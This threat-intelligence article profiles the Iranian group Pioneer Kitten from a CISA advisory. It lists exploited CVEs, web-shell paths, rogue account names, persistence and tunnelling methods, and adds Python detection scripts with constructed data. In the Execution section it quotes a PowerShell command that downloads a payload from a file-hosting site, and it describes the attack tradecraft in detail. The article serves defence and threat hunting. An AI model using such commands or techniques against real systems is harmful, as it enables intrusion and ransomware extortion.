Pioneer Kitten: The Iranian State-sponsored Cyber Actors
Pioneer Kitten (also tracked as Fox Kitten) is an Iranian state-sponsored cyber group that has been active since 2017. On underground forums the group operated as "Br0k3r", a handle that reflected its practice of selling access to compromised networks, and in 2024 it rebranded as "xplfinder". Its activity continued into August 2024, targeting organizations primarily in the United States and in Middle Eastern countries such as Israel, Azerbaijan, and the United Arab Emirates. The group's primary goal is to gain and sustain unauthorized access to victim networks, which it then monetizes in several ways.
Pioneer Kitten leverages this access to collaborate with ransomware affiliates, including NoEscape, RansomHouse, and ALPHV (aka BlackCat), playing a crucial role in enabling encryption operations and extortion. The group's involvement goes beyond merely providing access: it actively participates in locking victim networks and in devising strategies to maximize the extortion.
Tactics, Techniques, and Procedures (TTPs) used by Pioneer Kitten
The following is an overview of the TTPs observed in Pioneer Kitten's attack campaigns, as documented in CISA advisory AA24-241A [1], showing the group's systematic approach to compromising and exploiting victim networks.
Reconnaissance
T1596 - Search Open Technical Databases
Pioneer Kitten uses the Shodan[.]io search engine to identify IP addresses hosting network devices affected by known vulnerabilities (CVEs). Querying Shodan for these weaknesses, rather than scanning the internet themselves, lets the group locate publicly reachable devices that offer easy entry points, the "low-hanging fruit" that is cheapest to exploit.
Initial Access
T1190 - Exploit Public-Facing Application
Pioneer Kitten exploits these vulnerabilities in public-facing networking devices to gain initial access to target networks.
Notable vulnerabilities exploited by the group include:
- Citrix Netscaler: CVE-2019-19781, CVE-2023-3519
- F5 BIG-IP: CVE-2022-1388
- Pulse Secure/Ivanti VPNs: CVE-2024-21887
- Palo Alto Networks PAN-OS firewalls: CVE-2024-3400
- Check Point Security Gateways: CVE-2024-24919
Persistence
T1505.003 - Web Shell
After exploiting vulnerable devices, Pioneer Kitten deploys web shells to maintain persistence and to capture login credentials. Observed behaviour includes:
- Capturing login credentials on compromised Netscaler devices and appending them to a file named netscaler.1 in the same directory as the web shell.
- Creating the directory /var/vpn/themes/imgs/ on Citrix Netscaler devices and deploying malicious files there, such as:
  - netscaler.1
  - netscaler.php
  - ctxHeaderLogon.php
- Deploying additional web shells on compromised Netscaler devices right after system owners patch the exploited vulnerability. The new shells are a contingency plan: even once the original vulnerability is fixed, the actors keep pre-established alternative entry points, so patching alone does not evict them.
The additional web shells were observed at the following paths:
- /netscaler/logon/LogonPoint/uiareas/ui_style.php
- /netscaler/logon/sanpdebug.php
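One way to hunt for the indicators above on a Netscaler appliance is to take a timestamped file listing (for example the output of find /var/vpn /netscaler -type f -printf '%TY-%Tm-%Td %TH:%TM %p\n', run from the appliance shell) and check it for the exact paths reported here plus any PHP file in the web-content directories that appeared after the device was patched, which is how the post-patch shells would surface. The script below is an added example written for this page, not code from the original post or from CISA; the file listing and the patch date are constructed for the demo.

```python
"""Hunt a Netscaler file listing for the web-shell indicators reported for Pioneer Kitten."""
from datetime import datetime

# Exact paths reported for the web shells and the credential dump file
KNOWN_IOC_PATHS = {
    "/var/vpn/themes/imgs/netscaler.1",
    "/var/vpn/themes/imgs/netscaler.php",
    "/var/vpn/themes/imgs/ctxHeaderLogon.php",
    "/netscaler/logon/LogonPoint/uiareas/ui_style.php",
    "/netscaler/logon/sanpdebug.php",
}
# Web-content directories where any PHP file newer than the patch deserves a look,
# because additional shells were dropped right after patching
WATCHED_DIRS = ("/var/vpn/themes/", "/netscaler/logon/")

# Constructed sample listing in 'YYYY-MM-DD HH:MM /path' form (not real appliance data)
SAMPLE_LISTING = """\
2024-03-03 10:00 /netscaler/logon/LogonPoint/uiareas/theme.php
2024-06-01 09:15 /netscaler/logon/LogonPoint/index.html
2024-07-12 02:41 /var/vpn/themes/imgs/netscaler.php
2024-07-12 02:41 /var/vpn/themes/imgs/netscaler.1
2024-07-20 23:07 /netscaler/logon/sanpdebug.php
2024-07-21 01:33 /netscaler/logon/LogonPoint/uiareas/ui_style.php
2024-07-22 04:02 /netscaler/logon/LogonPoint/uiareas/theme_extra.php
"""
# Hypothetical date on which the appliance was patched
PATCHED_AT = datetime(2024, 7, 18)


def parse_listing(text):
    """Turn 'YYYY-MM-DD HH:MM /path' lines into (mtime, path) tuples."""
    entries = []
    for line in text.strip().splitlines():
        date, time, path = line.split(maxsplit=2)
        entries.append((datetime.fromisoformat(f"{date} {time}"), path))
    return entries


def find_suspicious(entries, patched_at):
    """Return (reason, path) for known IOC paths and for PHP files newer than the patch."""
    findings = []
    for mtime, path in entries:
        if path in KNOWN_IOC_PATHS:
            findings.append(("known-ioc", path))
        elif (path.endswith(".php")
              and path.startswith(WATCHED_DIRS)
              and mtime >= patched_at):
            findings.append(("php-newer-than-patch", path))
    return findings


def demo():
    """Run the hunt over the constructed listing."""
    return find_suspicious(parse_listing(SAMPLE_LISTING), PATCHED_AT)


if __name__ == "__main__":
    for reason, path in demo():
        print(f"{reason:22} {path}")
```

Known IOC paths are flagged regardless of timestamp, because an attacker can reset mtimes; the timestamp rule only adds coverage for shells whose names differ from the reported ones. Legitimate Netscaler PHP files predating the patch (theme.php in the sample) are left alone.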
T1136.001 - Create Account (Local Account)
The group creates local accounts on victim networks to maintain access. Observed account names include:
- "sqladmin$"
- "adfsservice"
- "IIS_Admin"
- "iis-admin"
- "John McCain"
By creating accounts that mimic legitimate system accounts (e.g., "IIS_Admin," "sqladmin$"), attackers ensure they have ongoing access to the system even if their initial entry method is detected and blocked. These accounts are used for lateral movement within the network, execution of commands, and further exploitation while blending in with regular user activity.
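Detection for this behaviour can go beyond matching the account names: a fresh local account that is immediately added to Administrators or Remote Desktop Users is the combination that matters. The script below is an added example for this page (not code from the original post or from CISA) that correlates Security-log event 4720 (account created) with 4732 (member added to a security-enabled local group). The events, the host and the subject account names are constructed for the demo; matching is done on a normalized form so that IIS_Admin and iis-admin are treated as the same name.

```python
"""Flag creation of the reported Pioneer Kitten account names and any immediate privilege grant."""
import re
from datetime import datetime

# Account names reported for Pioneer Kitten
KNOWN_ACCOUNT_NAMES = {"sqladmin$", "adfsservice", "IIS_Admin", "iis-admin", "John McCain"}
# Local groups whose membership makes a fresh account immediately dangerous
PRIVILEGED_GROUPS = {"administrators", "remote desktop users"}


def normalize(name):
    """Collapse case, separators and the trailing '$' so IIS_Admin and iis-admin match."""
    return re.sub(r"[^a-z0-9]", "", name.lower())


KNOWN_NORMALIZED = {normalize(n) for n in KNOWN_ACCOUNT_NAMES}


def _ts(event):
    """Parse the ISO-8601 TimeCreated field (Python < 3.11 does not accept a bare 'Z')."""
    return datetime.fromisoformat(event["TimeCreated"].replace("Z", "+00:00"))


# Constructed Security-log events (4720 = user account created, 4732 = member added to a
# security-enabled local group); 'backupadmin' and 'svc_deploy' are hypothetical subjects.
SAMPLE_EVENTS = [
    {"EventID": 4720, "TimeCreated": "2024-07-20T01:02:03Z",
     "SubjectUserName": "backupadmin", "TargetUserName": "IIS-Admin"},
    {"EventID": 4732, "TimeCreated": "2024-07-20T01:02:09Z",
     "SubjectUserName": "backupadmin", "MemberName": "IIS-Admin",
     "TargetUserName": "Administrators"},
    {"EventID": 4720, "TimeCreated": "2024-07-20T01:10:00Z",
     "SubjectUserName": "svc_deploy", "TargetUserName": "builder"},
    {"EventID": 4720, "TimeCreated": "2024-07-21T03:33:00Z",
     "SubjectUserName": "backupadmin", "TargetUserName": "adfsservice"},
]


def flag_account_creations(events, window_seconds=600):
    """Return one finding per creation of a known-bad account name.

    Severity is raised to "high" when the same account is added to a privileged
    local group within window_seconds of its creation.
    """
    creations = [e for e in events
                 if e["EventID"] == 4720 and normalize(e["TargetUserName"]) in KNOWN_NORMALIZED]
    group_adds = [e for e in events if e["EventID"] == 4732]
    findings = []
    for created in creations:
        name = created["TargetUserName"]
        finding = {"account": name, "created_by": created["SubjectUserName"],
                   "severity": "medium", "added_to": None}
        for add in group_adds:
            same_account = normalize(add["MemberName"]) == normalize(name)
            privileged = add["TargetUserName"].lower() in PRIVILEGED_GROUPS
            delta = (_ts(add) - _ts(created)).total_seconds()
            if same_account and privileged and 0 <= delta <= window_seconds:
                finding.update(severity="high", added_to=add["TargetUserName"])
                break
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for finding in flag_account_creations(SAMPLE_EVENTS):
        print(finding)
```

In a real 4732 event the MemberName field usually carries a SID rather than a name; resolve it before feeding the event in, or compare on the MemberSid field against the new account's SID from the 4720 event.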
T1098 - Account Manipulation
The attackers request exemptions from the victim's zero-trust application and security policies for the tools they intend to deploy, so that those tools can be installed and run without being blocked or flagged inside the network.
T1053 - Scheduled Task/Job
Pioneer Kitten uses scheduled tasks to maintain persistence by loading malware through installed backdoors. For example:
- A scheduled task named SpaceAgentTaskMgrSHR in the Windows/Spaceport/ task folder uses DLL side-loading to load its payload from a file named version.dll.
- The malicious version.dll backdoor is placed in the C:\Windows\ADFS\ directory.
T1505 - Server Software Component
Pioneer Kitten also creates a daily Windows service task that runs automatically each day. These tasks are given random eight-character names so that they look unremarkable and are harder to spot.
The task executes a DLL that carries the same name as the service, saved with a .sys extension in the C:\Windows\system32\drivers\ directory. For example, a service named "test" would load and run test.sys from that directory. Because both the service and the file sit among legitimate system drivers, the technique provides persistence while evading casual inspection.
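The two persistence mechanisms above leave artifacts that can be checked mechanically: a scheduled task whose action runs from a directory that also holds a version.dll (a legitimate version.dll lives only under System32 and SysWOW64, so one anywhere else is a side-loading indicator), and a System-log 7045 "service was installed" event for an eight-character service name whose image is <name>.sys under system32\drivers\. The script below is an added example for this page, not code from the original post or from CISA. The task XML, the file inventory and the 7045 events are constructed; hostapp.exe is a hypothetical side-loading host, and k3f9x2qa is a made-up service name.

```python
"""Hunt for the version.dll side-loading task and the eight-character driver service."""
import re
import xml.etree.ElementTree as ET
from pathlib import PureWindowsPath

TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}
# The only directories where a version.dll is expected on a Windows host
LEGIT_VERSION_DLL_DIRS = {r"c:\windows\system32", r"c:\windows\syswow64"}
EIGHT_ALNUM = re.compile(r"^[A-Za-z0-9]{8}$")

# Constructed task export in Task Scheduler XML (as produced by schtasks /query /xml);
# hostapp.exe is a hypothetical host binary placed next to the malicious version.dll
SAMPLE_TASK_XML = r"""<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <RegistrationInfo><URI>\Microsoft\Windows\Spaceport\SpaceAgentTaskMgrSHR</URI></RegistrationInfo>
  <Triggers><LogonTrigger><Enabled>true</Enabled></LogonTrigger></Triggers>
  <Actions Context="Author">
    <Exec><Command>C:\Windows\ADFS\hostapp.exe</Command></Exec>
  </Actions>
</Task>"""
# Constructed file inventory of the host
SAMPLE_FILES = {
    r"C:\Windows\ADFS\hostapp.exe",
    r"C:\Windows\ADFS\version.dll",
    r"C:\Windows\System32\version.dll",
}
# Constructed System-log 7045 events; rdyboost is a real Windows driver, k3f9x2qa is made up
SAMPLE_SERVICE_EVENTS = [
    {"EventID": 7045, "ServiceName": "rdyboost",
     "ImagePath": r"\SystemRoot\system32\drivers\rdyboost.sys"},
    {"EventID": 7045, "ServiceName": "k3f9x2qa",
     "ImagePath": r"C:\Windows\system32\drivers\k3f9x2qa.sys"},
    {"EventID": 7045, "ServiceName": "BackupAgentSvc",
     "ImagePath": r"C:\Program Files\Backup\agent.exe"},
]


def task_findings(task_xml, files_on_disk):
    """Flag the reported task name and any Exec action whose directory holds a version.dll."""
    present = {f.lower() for f in files_on_disk}
    root = ET.fromstring(task_xml)
    uri = root.findtext("t:RegistrationInfo/t:URI", default="", namespaces=TASK_NS)
    findings = []
    if uri.rsplit("\\", 1)[-1] == "SpaceAgentTaskMgrSHR":
        findings.append(("known-task-name", uri))
    for action in root.iterfind("t:Actions/t:Exec", TASK_NS):
        command = action.findtext("t:Command", default="", namespaces=TASK_NS).strip('"')
        parent = str(PureWindowsPath(command).parent).lower()
        if parent not in LEGIT_VERSION_DLL_DIRS and f"{parent}\\version.dll" in present:
            findings.append(("version-dll-sideload", command))
    return findings


def service_findings(events, baseline_drivers=frozenset()):
    """Flag newly installed services with an 8-character name whose image is <name>.sys in drivers\\."""
    findings = []
    for ev in events:
        if ev["EventID"] != 7045:
            continue
        name = ev["ServiceName"]
        if not EIGHT_ALNUM.match(name) or name.lower() in baseline_drivers:
            continue
        image = ev["ImagePath"].strip('"').lower()
        if image.endswith(f"\\system32\\drivers\\{name.lower()}.sys"):
            findings.append(("eight-char-driver-service", name, ev["ImagePath"]))
    return findings


if __name__ == "__main__":
    print(task_findings(SAMPLE_TASK_XML, SAMPLE_FILES))
    print(service_findings(SAMPLE_SERVICE_EVENTS, baseline_drivers={"rdyboost"}))
```

The eight-character rule is noisy on its own: plenty of legitimate drivers have eight-letter names (rdyboost in the sample), which is why the function takes a baseline of driver names from a known-good image and why a hit should be followed by a signature check on the .sys file rather than treated as a verdict.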
Privilege Escalation
T1078.003 - Valid Accounts: Local Accounts
Pioneer Kitten reuses credentials captured on exploited networking devices (for example, by the web shell on a Citrix Netscaler) to log into other applications such as Citrix XenDesktop.
Because XenDesktop is a virtual desktop infrastructure (VDI) platform, a valid login gives the actors an interactive session inside the environment, from which they can reach other parts of the network and move laterally to further the attack.
T1078.002 - Valid Accounts: Domain Accounts
The attackers reuse stolen admin credentials from network administrators to gain access to domain controllers and other key systems within the victim's network. This level of access is highly dangerous, as it allows them to control vital network functions, escalate privileges, spread malware, and exfiltrate sensitive data, putting the entire network at serious risk.
Defense Evasion
T1562.001 - Impair Defenses: Disable or Modify Tools
The group uses administrator credentials to disable antivirus and other security software, neutralizing the defenses that could detect, block, or remove its tools and activity. Malware that actively disables security controls in this way is what Picus calls "hunter-killer" malware. With these controls off, the actors keep their foothold on the compromised systems without interference from protective measures.
Credential Access
T1056 - Input Capture
Pioneer Kitten captures login credentials using web shells and other malicious tools deployed on compromised devices.
Execution
T1059.001 - Command and Scripting Interpreter: PowerShell
Pioneer Kitten uses stolen administrator accounts to open remote desktop sessions and run commands on compromised systems, often through Windows PowerShell. One observed command downloads a payload with Invoke-WebRequest:
Invoke-WebRequest -Uri http://files.catbox.moe/ -OutFile C:\Users\Public\malware.exe
The parts of this command are:
- Invoke-WebRequest: makes an HTTP/S request to the given URL.
- -Uri http://files.catbox.moe/: the request goes to the file-hosting site catbox.moe (the specific file path is not shown here).
- -OutFile C:\Users\Public\malware.exe: the response body is written to C:\Users\Public\, a directory every local user can write to, under a name chosen by the actors ("malware.exe" stands in for the real file name).
The actors also enable Windows PowerShell Web Access on servers so that they can run commands remotely through a browser.
Discovery
T1012 - Query Registry
Pioneer Kitten exports registry hives and network firewall configurations to gather detailed information about system settings, security policies, and network architecture.
T1482 - Domain Trust Discovery
Additionally, the group performs domain trust discovery by exfiltrating account usernames from the domain controller and accessing configuration files and logs. This allows them to map out domain relationships and identify critical assets, which they can leverage for further exploitation and lateral movement within the network.
Command and Control
T1219 - Remote Access Software
Pioneer Kitten installs remote access software such as AnyDesk and MeshCentral on compromised systems to maintain control.
From an attacker's perspective, installing remote access software on compromised systems ensures a consistent and reliable foothold in the network. These tools allow the attacker to access and control the system at any time without re-exploiting a vulnerability or re-establishing access if the initial entry point is detected and closed. Because the same tools are widely used by administrators, their presence also blends in with legitimate remote-management activity and is harder to spot.
T1572 - Protocol Tunneling
Pioneer Kitten uses tools such as Ligolo and ngrok to build encrypted tunnels that carry its command-and-control traffic discreetly.
- Ligolo sets up a reverse tunnel from the compromised system back to the attacker's machine. Traffic to internal resources is encapsulated in that encrypted tunnel, so the attacker can operate as if connected to the local network, while the only externally visible artifact is a single outbound connection from the pivot host.
- ngrok links the compromised system to a publicly reachable ngrok subdomain. Traffic sent to that subdomain is forwarded through ngrok's servers to the local system over an outbound HTTPS session, which firewalls and intrusion detection systems may treat as routine web traffic.
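The remote-access tools and tunnels above leave network-level traces that a proxy or Zeek-style connection log can be checked for: ngrok endpoints under the ngrok.io, ngrok.app, ngrok-free.app and ngrok-agent.com domains, AnyDesk relays under anydesk.com, MeshCentral agents connecting to the /agent.ashx websocket path, and ligolo-ng's default proxy listener on TCP 11601 (a default the operator can change). The script below is an added example for this page, not code from the original post or from CISA; the connection records are constructed, the internal hosts use RFC 1918 space, and the external addresses come from documentation ranges. The long-session rule is a heuristic, not an indicator from the page.

```python
"""Tag connection records for the remote-access and tunneling tools named on the page."""

NGROK_DOMAINS = ("ngrok.io", "ngrok.app", "ngrok-free.app", "ngrok-agent.com")
ANYDESK_DOMAINS = ("anydesk.com",)        # relays appear as *.net.anydesk.com
MESHCENTRAL_AGENT_PATH = "/agent.ashx"    # websocket path MeshCentral agents connect to
LIGOLO_NG_DEFAULT_PORT = 11601            # ligolo-ng proxy default listener; configurable
LONG_SESSION_SECONDS = 6 * 3600           # heuristic: very long external TLS sessions look like tunnels

# Constructed records: src, dst, dport, proto, optional sni/uri, duration in seconds
SAMPLE_CONNS = [
    {"src": "10.20.1.15", "dst": "203.0.113.8", "dport": 443, "proto": "tls",
     "sni": "abcd-1234.ngrok-free.app", "duration_s": 30},
    {"src": "10.20.1.15", "dst": "203.0.113.9", "dport": 443, "proto": "tls",
     "sni": "relay-1a2b.net.anydesk.com", "duration_s": 9000},
    {"src": "10.20.1.22", "dst": "198.51.100.7", "dport": 443, "proto": "http",
     "uri": "/agent.ashx", "duration_s": 25000},
    {"src": "10.20.1.22", "dst": "198.51.100.7", "dport": 11601, "proto": "tls",
     "sni": "", "duration_s": 30000},
    {"src": "10.20.1.30", "dst": "10.20.0.5", "dport": 443, "proto": "tls",
     "sni": "intranet.corp.example", "duration_s": 40000},
    {"src": "10.20.1.30", "dst": "203.0.113.50", "dport": 443, "proto": "tls",
     "sni": "www.example.com", "duration_s": 12},
]


def _in_domains(host, domains):
    """True if host equals one of domains or is a subdomain of one."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in domains)


def _is_rfc1918(ip):
    """Private IPv4 check done by hand, because ipaddress treats documentation ranges as private."""
    first, second = (int(x) for x in ip.split(".")[:2])
    return first == 10 or (first == 172 and 16 <= second <= 31) or (first == 192 and second == 168)


def classify(conn):
    """Return the list of tags that apply to one connection record."""
    tags = []
    sni = conn.get("sni", "")
    if _in_domains(sni, NGROK_DOMAINS):
        tags.append("ngrok-tunnel")
    if _in_domains(sni, ANYDESK_DOMAINS):
        tags.append("anydesk-relay")
    if conn.get("uri", "").endswith(MESHCENTRAL_AGENT_PATH):
        tags.append("meshcentral-agent")
    if conn["dport"] == LIGOLO_NG_DEFAULT_PORT:
        tags.append("ligolo-ng-default-port")
    if (conn["proto"] == "tls" and not _is_rfc1918(conn["dst"])
            and conn["duration_s"] >= LONG_SESSION_SECONDS):
        tags.append("long-lived-external-tls")
    return tags


def hunt(conns):
    """Flatten the tags into (tag, 'src->dst:dport') findings."""
    return [(tag, f'{c["src"]}->{c["dst"]}:{c["dport"]}') for c in conns for tag in classify(c)]


if __name__ == "__main__":
    for tag, flow in hunt(SAMPLE_CONNS):
        print(f"{tag:26} {flow}")
```

The domain and path rules are high-confidence; the port and duration rules are cheap pivots that should be confirmed against the process that owns the socket (Sysmon event 3 or equivalent), since ligolo-ng can listen on any port and a legitimate VPN session can also be long-lived.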
Exfiltration and Impact
T1657 - Financial Theft
After infiltrating victim networks, Pioneer Kitten collaborates with ransomware affiliates, including NoEscape, RansomHouse, and ALPHV (aka BlackCat), providing them with access to the compromised networks in exchange for a share of the ransom payments. The actors also steal data, likely in support of Iranian government objectives as well as for financial gain.
How Picus Helps Simulate Pioneer Kitten Attacks
We also strongly suggest simulating Pioneer Kitten attacks to test the effectiveness of your security controls against sophisticated cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other state-sponsored threat actors, such as APT40, Lazarus, and Volt Typhoon, within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for Pioneer Kitten, aka Fox Kitten [2], and its affiliates:
Threat ID | Threat Name | Attack Module
99935 | Fox Kitten Campaign Malware Email Threat | E-mail Infiltration
57995 | Fox Kitten Campaign Malware Download Threat | Network Infiltration
64903 | NoEscape Ransomware Download Threat | Network Infiltration
28790 | NoEscape Ransomware Email Threat | E-mail Infiltration
75742 | BlackCat Ransomware Campaign 2022 | Windows Endpoint
93524 | BlackCat Ransomware Campaign 2022 | Linux Endpoint
92332 | BlackCat Ransomware Email Threat | E-mail Infiltration
54213 | BlackCat Ransomware Download Threat | Network Infiltration
75365 | The RansomHouse Threat Group Campaign Malware Download | Network Infiltration
41775 | The RansomHouse Threat Group Campaign Malware Email Threat | E-mail Infiltration
Picus also provides actionable mitigation content. Picus Mitigation Library includes prevention signatures to address malware and vulnerabilities exploited by the Pioneer Kitten group in preventive security controls. Currently, Picus Labs validated the following signatures for Pioneer Kitten Group:
Security Control | Signature ID | Signature Name
CheckPoint | 0E10524C1 | Trojan.Win32.Generic.TC.b77eSYFZ
CheckPoint | 0A316073D | Ransomware.Win32.NoEscape.TC.23f6HLVp
CheckPoint | 0CC97E9AB | Trojan-Ransom.Win32.Cryptor.TC.4e5eBKGN
Forcepoint | | File_Malware-Blocked
Fortinet AV | 6176954 | MSIL/Tiny.BQ!tr.dldr
Fortinet AV | 8182900 | Riskware/SSHNet
Fortinet AV | 62183 | PossibleThreat
Fortinet AV | 10140397 | W32/Filecoder_Avaddon.H!tr.ransom
Fortinet AV | 10147974 | W32/Avaddon.H!tr.ransom
Fortinet AV | 10153973 | Linux/Filecoder_NoEscape.B!tr
Fortinet AV | 10137650 | ELF/Babuk.D597!tr.ransom
Fortinet AV | 10054921 | Linux/Filecoder_Babyk.A!tr
Trellix | 0x4840c900 | MALWARE: Malicious File Detected by GTI
Palo Alto | 179774634 | Trojan-Veil/Win32.flrh.a
Palo Alto | 333471849 | trojan/Win32 EXE.htool.ar
Palo Alto | 612809409 | trojan/Linux.noescape.h
Palo Alto | 605194932 | Ransom/Win32.noescape.e
Palo Alto | 587399268 | Trojan/Win32.cryptinject.hqu
Palo Alto | 619620462 | Ransom/Linux.noescape.m
Palo Alto | 584113416 | Ransom/Linux.esxiargs.a
Palo Alto | 607701795 | Trojan-Ransom/Linux.babuk.cy
Palo Alto | 627436494 | Ransom/Linux.mario.i
Palo Alto | 628705521 | Ransom/Linux.babuk.ep
Cisco FirePower | W32.D42F454627-100.SBX.VIOC |
Cisco FirePower | Win.Noescape.tii.Talos |
Cisco FirePower | W32.Auto:2c1a4f.in03.Talos |
Cisco FirePower | W32.Auto:d36afc.in03.Talos |
Cisco FirePower | W32.Auto:3934b3.in03.Talos |
Cisco FirePower | W32.Auto:afe398.in03.Talos |
Cisco FirePower | Auto.0A77E5.262364.in02 |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
References
[1] "Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations," Cybersecurity and Infrastructure Security Agency CISA. [Online]. Available: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-241a
[2] Fraunhofer FKIE, "Fox Kitten (Threat Actor)," Malpedia. [Online]. Available: https://malpedia.caad.fkie.fraunhofer.de/actor/fox_kitten. [Accessed: Aug. 28, 2024]